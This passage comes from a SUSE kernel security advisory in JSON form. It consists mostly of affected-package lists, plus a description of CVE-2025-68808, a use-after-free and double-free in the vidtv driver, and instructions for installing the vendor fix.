"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "important"
}
],
"title": "CVE-2025-68804"
},
{
"cve": "CVE-2025-68808",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68808"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: vidtv: initialize local pointers upon transfer of memory ownership\n\nvidtv_channel_si_init() creates a temporary list (program, service, event)\nand ownership of the memory itself is transferred to the PAT/SDT/EIT\ntables through vidtv_psi_pat_program_assign(),\nvidtv_psi_sdt_service_assign(), vidtv_psi_eit_event_assign().\n\nThe problem here is that the local pointer where the memory ownership\ntransfer was completed is not initialized to NULL. This causes the\nvidtv_psi_pmt_create_sec_for_each_pat_entry() function to fail, and\nin the flow that jumps to free_eit, the memory that was freed by\nvidtv_psi_*_table_destroy() can be accessed again by\nvidtv_psi_*_event_destroy() due to the uninitialized local pointer, so it\nis freed once again.\n\nTherefore, to prevent use-after-free and double-free vulnerability,\nlocal pointers must be initialized to NULL when transferring memory\nownership.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68808",
"url": "https://www.suse.com/security/cve/CVE-2025-68808"
},
{
"category": "external",
"summary": "SUSE Bug 1256682 for CVE-2025-68808",
"url": "https://bugzilla.suse.com/1256682"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
